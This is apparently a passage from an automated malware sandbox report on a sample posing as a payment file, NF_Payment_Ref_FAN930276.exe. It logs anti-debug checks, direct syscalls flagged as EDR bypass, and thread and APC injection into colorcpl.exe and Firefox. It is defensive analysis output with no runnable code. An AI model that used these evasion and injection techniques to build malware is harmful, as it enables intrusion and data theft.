Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B64978 mov eax, dword ptr fs:[00000030h]	4_2_01B64978
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B0096E mov eax, dword ptr fs:[00000030h]	4_2_01B0096E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B0096E mov edx, dword ptr fs:[00000030h]	4_2_01B0096E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B0096E mov eax, dword ptr fs:[00000030h]	4_2_01B0096E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B40946 mov eax, dword ptr fs:[00000030h]	4_2_01B40946
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94940 mov eax, dword ptr fs:[00000030h]	4_2_01B94940
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4C89D mov eax, dword ptr fs:[00000030h]	4_2_01B4C89D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0887 mov eax, dword ptr fs:[00000030h]	4_2_01AC0887
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC8F9 mov eax, dword ptr fs:[00000030h]	4_2_01AFC8F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC8F9 mov eax, dword ptr fs:[00000030h]	4_2_01AFC8F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8A8E4 mov eax, dword ptr fs:[00000030h]	4_2_01B8A8E4
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE8C0 mov eax, dword ptr fs:[00000030h]	4_2_01AEE8C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B908C0 mov eax, dword ptr fs:[00000030h]	4_2_01B908C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6483A mov eax, dword ptr fs:[00000030h]	4_2_01B6483A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6483A mov eax, dword ptr fs:[00000030h]	4_2_01B6483A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov ecx, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]	4_2_01AE2835
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA830 mov eax, dword ptr fs:[00000030h]	4_2_01AFA830
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4C810 mov eax, dword ptr fs:[00000030h]	4_2_01B4C810
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56870 mov eax, dword ptr fs:[00000030h]	4_2_01B56870
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56870 mov eax, dword ptr fs:[00000030h]	4_2_01B56870
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4E872 mov eax, dword ptr fs:[00000030h]	4_2_01B4E872
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4E872 mov eax, dword ptr fs:[00000030h]	4_2_01B4E872
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD2840 mov ecx, dword ptr fs:[00000030h]	4_2_01AD2840
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4859 mov eax, dword ptr fs:[00000030h]	4_2_01AC4859
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4859 mov eax, dword ptr fs:[00000030h]	4_2_01AC4859
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF0854 mov eax, dword ptr fs:[00000030h]	4_2_01AF0854
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B74BB0 mov eax, dword ptr fs:[00000030h]	4_2_01B74BB0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B74BB0 mov eax, dword ptr fs:[00000030h]	4_2_01B74BB0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0BBE mov eax, dword ptr fs:[00000030h]	4_2_01AD0BBE
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0BBE mov eax, dword ptr fs:[00000030h]	4_2_01AD0BBE
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4CBF0 mov eax, dword ptr fs:[00000030h]	4_2_01B4CBF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEEBFC mov eax, dword ptr fs:[00000030h]	4_2_01AEEBFC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]	4_2_01AC8BF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]	4_2_01AC8BF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]	4_2_01AC8BF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]	4_2_01AC0BCD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]	4_2_01AC0BCD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]	4_2_01AC0BCD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]	4_2_01AE0BCB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]	4_2_01AE0BCB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]	4_2_01AE0BCB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6EBD0 mov eax, dword ptr fs:[00000030h]	4_2_01B6EBD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEEB20 mov eax, dword ptr fs:[00000030h]	4_2_01AEEB20
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEEB20 mov eax, dword ptr fs:[00000030h]	4_2_01AEEB20
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B88B28 mov eax, dword ptr fs:[00000030h]	4_2_01B88B28
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B88B28 mov eax, dword ptr fs:[00000030h]	4_2_01B88B28
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]	4_2_01B3EB1D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94B00 mov eax, dword ptr fs:[00000030h]	4_2_01B94B00
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABCB7E mov eax, dword ptr fs:[00000030h]	4_2_01ABCB7E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6EB50 mov eax, dword ptr fs:[00000030h]	4_2_01B6EB50
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B92B57 mov eax, dword ptr fs:[00000030h]	4_2_01B92B57
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B92B57 mov eax, dword ptr fs:[00000030h]	4_2_01B92B57
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B92B57 mov eax, dword ptr fs:[00000030h]	4_2_01B92B57
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B92B57 mov eax, dword ptr fs:[00000030h]	4_2_01B92B57
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B68B42 mov eax, dword ptr fs:[00000030h]	4_2_01B68B42
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56B40 mov eax, dword ptr fs:[00000030h]	4_2_01B56B40
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56B40 mov eax, dword ptr fs:[00000030h]	4_2_01B56B40
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8AB40 mov eax, dword ptr fs:[00000030h]	4_2_01B8AB40
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8B50 mov eax, dword ptr fs:[00000030h]	4_2_01AB8B50
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B74B4B mov eax, dword ptr fs:[00000030h]	4_2_01B74B4B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B74B4B mov eax, dword ptr fs:[00000030h]	4_2_01B74B4B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8AA0 mov eax, dword ptr fs:[00000030h]	4_2_01AC8AA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC8AA0 mov eax, dword ptr fs:[00000030h]	4_2_01AC8AA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B16AA4 mov eax, dword ptr fs:[00000030h]	4_2_01B16AA4
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94A80 mov eax, dword ptr fs:[00000030h]	4_2_01B94A80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF8A90 mov edx, dword ptr fs:[00000030h]	4_2_01AF8A90
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFAAEE mov eax, dword ptr fs:[00000030h]	4_2_01AFAAEE
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFAAEE mov eax, dword ptr fs:[00000030h]	4_2_01AFAAEE
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0AD0 mov eax, dword ptr fs:[00000030h]	4_2_01AC0AD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]	4_2_01B16ACC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]	4_2_01B16ACC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]	4_2_01B16ACC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF4AD0 mov eax, dword ptr fs:[00000030h]	4_2_01AF4AD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF4AD0 mov eax, dword ptr fs:[00000030h]	4_2_01AF4AD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEEA2E mov eax, dword ptr fs:[00000030h]	4_2_01AEEA2E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFCA24 mov eax, dword ptr fs:[00000030h]	4_2_01AFCA24
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFCA38 mov eax, dword ptr fs:[00000030h]	4_2_01AFCA38
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE4A35 mov eax, dword ptr fs:[00000030h]	4_2_01AE4A35
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE4A35 mov eax, dword ptr fs:[00000030h]	4_2_01AE4A35
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4CA11 mov eax, dword ptr fs:[00000030h]	4_2_01B4CA11
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]	4_2_01AFCA6F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]	4_2_01AFCA6F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]	4_2_01AFCA6F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3CA72 mov eax, dword ptr fs:[00000030h]	4_2_01B3CA72

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtTerminateThread: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: NULL target: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread register set: target process: 6592

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread APC queued: target process: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: xIrbjTuvDXL.exe, 00000005.00000000.2188557060.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487293076.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000000.2337317767.0000000001891000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: xIrbjTuvDXL.exe, 00000005.00000000.2188557060.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487293076.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000000.2337317767.0000000001891000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xIrbjTuvDXL.exe, 00000005.00000000.2188557060.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487293076.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000000.2337317767.0000000001891000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: xIrbjTuvDXL.exe, 00000005.00000000.2188557060.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487293076.0000000001321000.00000002.00000001.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000000.2337317767.0000000001891000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

